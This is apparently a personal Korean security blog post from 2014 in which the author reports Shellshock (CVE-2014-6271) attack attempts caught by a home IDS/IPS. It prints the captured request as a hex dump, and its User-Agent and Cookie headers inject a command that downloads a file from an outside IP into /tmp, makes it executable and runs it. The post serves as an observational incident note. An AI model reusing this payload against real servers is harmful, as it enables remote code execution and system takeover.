2014.11.08. 19:24
얼마전에 언제나 제작중인;; 홈페이지 서버 네트워크에 IDS/IPS을 구축했는데
하루에 한번 이상으로 Bash취약점 공격(CVE-2014-6271)이 들어오고 있네요...
아마 무작위 공격 같습니다.
뭐 이 외에도 SIP스캔, SSH 취약점, MySQL/MSSQL서버 취약점 공격이 들어오곤 있습니다.
뭐 그냥 얼마전에 이슈가 되었던 Bash취약점을 이용한 공격이라서 씁니다.
공격SourceIP는 미국이고
Dest는 80포트 입니다.
페이로드
0000000: 47 45 54 20 2f 63 67 69 2d 6d 6f 64 2f 69 6e 64 65 78 2e 63 67 69 20 48 54 54 GET./cgi-mod/index.cgi.HTT 000001A: 50 2f 31 2e 30 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 55 73 P/1.0.Connection:.close.Us 0000034: 65 72 2d 41 67 65 6e 74 3a 20 28 29 20 7b 20 3a 3b 20 7d 3b 20 2f 75 73 72 2f er-Agent:.().{.:;.};./usr/ 000004E: 62 69 6e 2f 77 67 65 74 20 2d 4f 20 2f 74 6d 70 2f 62 20 68 74 74 70 3a 2f 2f bin/wget.-O./tmp/b.http:// 0000068: 31 30 34 2e 31 39 32 2e 31 30 33 2e 36 2f 66 6f 6f 6e 2f 71 2f 62 3b 20 2f 62 104.192.103.6/foon/q/b;./b 0000082: 69 6e 2f 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 3b 20 2f 74 6d 70 2f in/chmod.777./tmp/b;./tmp/ 000009C: 62 3b 0a 43 6f 6f 6b 69 65 3a 20 28 29 20 7b 20 3a 3b 20 7d 3b 20 2f 75 73 72 b;.Cookie:.().{.:;.};./usr 00000B6: 2f 62 69 6e 2f 77 67 65 74 20 2d 4f 20 2f 74 6d 70 2f 62 20 68 74 74 70 3a 2f /bin/wget.-O./tmp/b.http:/ 00000D0: 2f 31 30 34 2e 31 39 32 2e 31 30 33 2e 36 2f 66 6f 6f 6e 2f 71 2f 62 3b 20 2f /104.192.103.6/foon/q/b;./ 00000EA: 62 69 6e 2f 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 3b 20 2f 74 6d 70 bin/chmod.777./tmp/b;./tmp 0000104: 2f 62 3b 0a 0a /b;.. |
참고로 국내에서 저 IP로 접속이 되지 않습니다. ISP? 정부? 에서 막아 논것 같네요~
심심해서 해외VPN을 이용해 접속해 보니 저 IP로 접속은 되는데 저 파일 URL으로는 접속이 되지 않습니다.
404오류가 나네요. 한번 분석해 보고 싶었는데(물론 깊게 할 능력이 안되지만...ㅋ) 아쉽습니다.
반응형
'보안' 카테고리의 다른 글
| github 피싱 메일 주의! (0) | 2020.04.05 |
|---|---|
| SafeNet 5110 AES Performance Test (0) | 2020.01.23 |
| 한국 메일로 유포되는 악성메일 분석 (JS/Obfus.S29) (0) | 2016.04.30 |
| 가짜 네이버 사이트 (파밍) 조심하세요! (가짜IP알려드림) (0) | 2015.12.11 |
| bash취약점!!! (리눅스·OS X 셸에 중대 보안취약점 발견) (0) | 2015.07.31 |
댓글